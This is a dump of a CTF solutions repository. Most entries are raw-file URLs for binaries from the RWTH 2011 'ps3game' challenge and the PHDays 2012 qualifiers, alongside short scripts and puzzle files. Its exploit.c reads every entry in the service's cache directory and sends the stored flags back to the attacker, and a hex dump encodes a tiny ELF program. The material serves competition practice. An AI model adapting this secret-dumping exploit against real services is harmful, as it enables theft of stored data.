/2011.rwth/ps3game/cache/DyfARV0Cyw5-29UVwCcYKQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/DyfARV0Cyw5-29UVwCcYKQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/FK7gFw30u2r-yiui+Tgz4Q--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/FK7gFw30u2r-yiui+Tgz4Q--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/FKJeOBblG4eWEOWuVnSDag--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/FKJeOBblG4eWEOWuVnSDag--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/FiAwUlKcn7mxgZUCjMEeYA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/FiAwUlKcn7mxgZUCjMEeYA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/GJiEFB9AxIksxVGCkitVOA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/GJiEFB9AxIksxVGCkitVOA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/H3KWAHsvdFomEJflE-+N9g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/H3KWAHsvdFomEJflE-+N9g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/IGV7VEvykDw+3bwADql8Ig--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/IGV7VEvykDw+3bwADql8Ig--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/J49L6HPy9QmbFJkjK-iPbA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/J49L6HPy9QmbFJkjK-iPbA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/JoY5tk64HqMRRbV+ofbbvQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/JoY5tk64HqMRRbV+ofbbvQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/KTr8TH6h8I+0xu1iEYyXqQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/KTr8TH6h8I+0xu1iEYyXqQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/KzfQmoB8Kx9xyFGopE1HLA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/KzfQmoB8Kx9xyFGopE1HLA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/LCfciUZz4PPg9dyApaCTew--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/LCfciUZz4PPg9dyApaCTew--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/LNgJL5a9M1DfmdnjSQkRtg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/LNgJL5a9M1DfmdnjSQkRtg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/LrpV+M6G68xxiiAqhpiezw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/LrpV+M6G68xxiiAqhpiezw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/MxQvogpYZnvbiPuqvVXBuw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/MxQvogpYZnvbiPuqvVXBuw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Mz72WvAATzoNFJ0qno5n1g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Mz72WvAATzoNFJ0qno5n1g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/OHUkKFwYjsJoUXqbWsy-bw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/OHUkKFwYjsJoUXqbWsy-bw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PIuFazzvNvAl9brZvwxWsQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PIuFazzvNvAl9brZvwxWsQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PPaNMqGCtVVVpcAKaIqAfw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PPaNMqGCtVVVpcAKaIqAfw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PVfmLGySkBCbrEPMGJiBXQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PVfmLGySkBCbrEPMGJiBXQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PcEtPK7ze5vxuewAfqIuRg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PcEtPK7ze5vxuewAfqIuRg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PduRo95GSz87e3h7vSxPoA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PduRo95GSz87e3h7vSxPoA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/PmN6yjVOgUJXGxaM9z+iYg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/PmN6yjVOgUJXGxaM9z+iYg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Q5TcpPllojISA9oIvD08+A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Q5TcpPllojISA9oIvD08+A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/QDaeHSL2m81j35RqDPk-ow--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/QDaeHSL2m81j35RqDPk-ow--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Qinj40wn32l0HD8gUxcBuA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Qinj40wn32l0HD8gUxcBuA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/RFiqMlbwMxAhq1FSdpWrMQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/RFiqMlbwMxAhq1FSdpWrMQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/RFyrBKzjA2HIu4EBZHbDog--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/RFyrBKzjA2HIu4EBZHbDog--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/RiKKApO7M7RPXn+GdduyzQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/RiKKApO7M7RPXn+GdduyzQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/S79djgDrQRHWvTvWV1ES1Q--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/S79djgDrQRHWvTvWV1ES1Q--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/VE6UQgTyihVGlij0ZnfcZw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/VE6UQgTyihVGlij0ZnfcZw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/VI3ZZdwgX8c4tJbw-fNHFQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/VI3ZZdwgX8c4tJbw-fNHFQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Vt96P4fBy0c4oLzRGd5ZJQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Vt96P4fBy0c4oLzRGd5ZJQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Wuy-wd8h2vdgo4R-NKt2HQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Wuy-wd8h2vdgo4R-NKt2HQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Y+N0PA-tn6sjK3JxbKjjvQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Y+N0PA-tn6sjK3JxbKjjvQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Y3FLzmBuQOifkoGQHGWY6g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Y3FLzmBuQOifkoGQHGWY6g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/YbZ9b1VWHKNJKd697KRvTw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/YbZ9b1VWHKNJKd697KRvTw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/Yt5k2GBkFPfLbeLwJynFqA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/Yt5k2GBkFPfLbeLwJynFqA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/akoAEb0vGVj5ScS2eoJ06Q--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/akoAEb0vGVj5ScS2eoJ06Q--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/dmWmSovAcK24XTl1G1UDBA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/dmWmSovAcK24XTl1G1UDBA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/e-ms74D-6IqPdbA3JQ7shQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/e-ms74D-6IqPdbA3JQ7shQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/etcYi4wsk1eW-NlAx4cH5g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/etcYi4wsk1eW-NlAx4cH5g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/f77e49hxpWVk7W0-5zT58A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/f77e49hxpWVk7W0-5zT58A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/g9ez1kSR0D+M4-O6-bFoYA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/g9ez1kSR0D+M4-O6-bFoYA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/hc6LjPhDkZlZdC5NHab+1A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/hc6LjPhDkZlZdC5NHab+1A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/hpneofZAHH8jvIY6Hwqq8A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/hpneofZAHH8jvIY6Hwqq8A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/i7DSy-mxkmq+pGhpn26zcQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/i7DSy-mxkmq+pGhpn26zcQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/iIdC3KeHQlR5GlxG9bb1Tw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/iIdC3KeHQlR5GlxG9bb1Tw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/ibx9lU+plsRpIMqmv5rTaA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/ibx9lU+plsRpIMqmv5rTaA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/jum7J9ygutQmblONKNWM4A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/jum7J9ygutQmblONKNWM4A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/kYrG14gKULVI7rMpN9SBCQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/kYrG14gKULVI7rMpN9SBCQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/lITN2BeSSDJWUls1YLgwVA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/lITN2BeSSDJWUls1YLgwVA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/n-gHgk1Bv22FUgznDDh3XQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/n-gHgk1Bv22FUgznDDh3XQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/nDNOV-J1P0sv7MifuJyhQw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/nDNOV-J1P0sv7MifuJyhQw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/nkFqK18r8msnM9CyMl8Z5g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/nkFqK18r8msnM9CyMl8Z5g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/o3d99FjUWGZgcvOf--b18Q--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/o3d99FjUWGZgcvOf--b18Q--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/pI8XaqAYsC8uv0Jdx8yOKg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/pI8XaqAYsC8uv0Jdx8yOKg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/pL7yZfnrqvBc8hQKToseHA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/pL7yZfnrqvBc8hQKToseHA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/ptqPZwFsP4xTK8--or+VCg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/ptqPZwFsP4xTK8--or+VCg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/pucUxcDh7gRlrbX+KKlSVQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/pucUxcDh7gRlrbX+KKlSVQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/pxS4Yugb7mEtEBATlzM64A--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/pxS4Yugb7mEtEBATlzM64A--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/qcNa-SrW8KociKBEFY19Hg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/qcNa-SrW8KociKBEFY19Hg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/sfBTHPk8qAgY63Aq+68pnQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/sfBTHPk8qAgY63Aq+68pnQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/tkx5Qtdfw-nGrIQ-E+aK+g--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/tkx5Qtdfw-nGrIQ-E+aK+g--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/v+nbJtH7WzodBbzKWU7kEw--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/v+nbJtH7WzodBbzKWU7kEw--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/v2arp7CudT4QzI+Lh1w2aA--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/v2arp7CudT4QzI+Lh1w2aA--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/vZntf9gy29ip1Op4qJsGTg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/vZntf9gy29ip1Op4qJsGTg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/wMCldWf9U7TDC7+un0MKjQ--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/wMCldWf9U7TDC7+un0MKjQ--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/xD6FIoBjhVWmT9e1BFY-rg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/xD6FIoBjhVWmT9e1BFY-rg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/y4y7r5pGvTp9oo08VtM6jg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/y4y7r5pGvTp9oo08VtM6jg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/cache/z7042O3VJUBuTJxua7pLzg--:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/cache/z7042O3VJUBuTJxua7pLzg--


--------------------------------------------------------------------------------
/2011.rwth/ps3game/codeserv.ko:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/codeserv.ko


--------------------------------------------------------------------------------
/2011.rwth/ps3game/exploit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/exploit


--------------------------------------------------------------------------------
/2011.rwth/ps3game/exploit.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/exploit.bin


--------------------------------------------------------------------------------
/2011.rwth/ps3game/exploit.c:
--------------------------------------------------------------------------------
 1 | #include 
 2 | #include 
 3 | 
 4 | extern int store_flag(const char * token, const char * flag);
 5 | extern int retrieve_flag(const char * token, char * flag);
 6 | extern int send_response(char * response, size_t length);
 7 | 
 8 | typedef int (*FStore)(const char * token, const char * flag);
 9 | typedef int (*FRetrieve)(const char * token, char * flag);
10 | typedef int (*FSend)(char * response, size_t length);
11 | 
12 | 
13 | int exploit(FStore mystore, FRetrieve myretrive, FSend mysend)
14 | {
15 | struct dirent* curdir;
16 | char dirname[128] = "cache";
17 | DIR* dir = opendir( "cache" );
18 | while ( curdir = readdir( dir ) )
19 | 	{
20 | 	if ( curdir->d_type == DT_REG )
21 | 		{
22 | 		myretrive( curdir->d_name, dirname );
23 | 		mysend( dirname + 12, 20 );
24 | 		}
25 | 	}
26 | return closedir( dir );
27 | }
28 | 
29 | int main()
30 | {
31 | return exploit(store_flag, retrieve_flag, send_response);
32 | }
33 | 
34 | 


--------------------------------------------------------------------------------
/2011.rwth/ps3game/load.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | modparams="sym_udp_protocol=0x$(egrep \\Wudp_protocol$ /boot/System.map-`uname -r` | awk '{print $1}')"
 4 | 
 5 | echo -n Loading module with \"$modparams\"...
 6 | 
 7 | 
 8 | if insmod codeserv.ko $modparams 2>/dev/null; then
 9 | 	echo ' success.'
10 | 	exit 0
11 | else
12 | 	echo ' failed.'
13 | 	echo -n Trying to remove existing module...
14 | 
15 | 	if rmmod codeserv.ko 2>/dev/null; then
16 | 		echo ' success.'
17 | 
18 | 		echo -n Trying to load module again...
19 | 
20 | 		if insmod codeserv.ko $modparams 2>/dev/null; then
21 | 		        echo ' success.'
22 | 			exit 0
23 | 		else
24 | 		        echo ' failed.'
25 | 		fi
26 | 	else
27 | 		echo ' failed.'
28 | 	fi
29 | fi
30 | 
31 | exit -1
32 | 


--------------------------------------------------------------------------------
/2011.rwth/ps3game/ps3game:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/ps3game


--------------------------------------------------------------------------------
/2011.rwth/ps3game/ps3gamedbg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/ps3game/ps3gamedbg


--------------------------------------------------------------------------------
/2011.school-ctf/kvadrat/README.md:
--------------------------------------------------------------------------------
 1 | ## [Kvadrat](http://blackbox.sibears.ru/tasks/kvadrat/)
 2 | 
 3 | from [School CTF 2011](http://blackbox.sibears.ru/news/school-ctf-2011/)
 4 | 
 5 | > We found encrypted letter from Vasya to Ded Moroz. We definitely know it begins with “hellodedmoroz!howareyou?” Can you fully decrypt it and get Vasya's secret?
 6 | 
 7 | ### the letter:
 8 | 
 9 | ~~~
10 | wihswaan
11 | reeecrle
12 | ltttodyo
13 | uo:e?std
14 | emislaoi
15 | belyrmoo
16 | fuinamer
17 | z!zh!yoz
18 | ~~~
19 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/bin100/0.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/bin100/0.exe


--------------------------------------------------------------------------------
/2012.phdays-quals/bin100/1.deupx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/bin100/1.deupx.exe


--------------------------------------------------------------------------------
/2012.phdays-quals/bin100/2.restored.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/bin100/2.restored.exe


--------------------------------------------------------------------------------
/2012.phdays-quals/bin200/clicker.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | 
 3 | KEYS = "58374612"
 4 | 
 5 | def push num
 6 |   y = 480 + 51*(num.to_i-1)
 7 |   system "xdotool search --name xp mousemove 440 #{y} mousedown 1 sleep 0.25 mouseup 1"
 8 |   sleep 0.25
 9 | end
10 | 
11 | KEYS.split('').each do |key|
12 |   push key
13 | end
14 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/bin200/firmware.hex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/bin200/firmware.hex


--------------------------------------------------------------------------------
/2012.phdays-quals/bin200/picrackme.DSN:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/bin200/picrackme.DSN


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f100/0.png


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/1_qr_decoded.txt:
--------------------------------------------------------------------------------
1 | 7F454C46010000000000000000004305020003001A0043051A00430504000000B931004305B220CD80252000010093CD803030343330354232323043443830323532303030303130303933434438300A
2 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/2.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2012.phdays-quals/f100/2.bin


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/2.bin.strings-pasword-for-rar:
--------------------------------------------------------------------------------
1 | 004305B220CD80252000010093CD80
2 | 


--------------------------------------------------------------------------------
/2012.phdays-quals/f100/4_all.1.dat:
--------------------------------------------------------------------------------
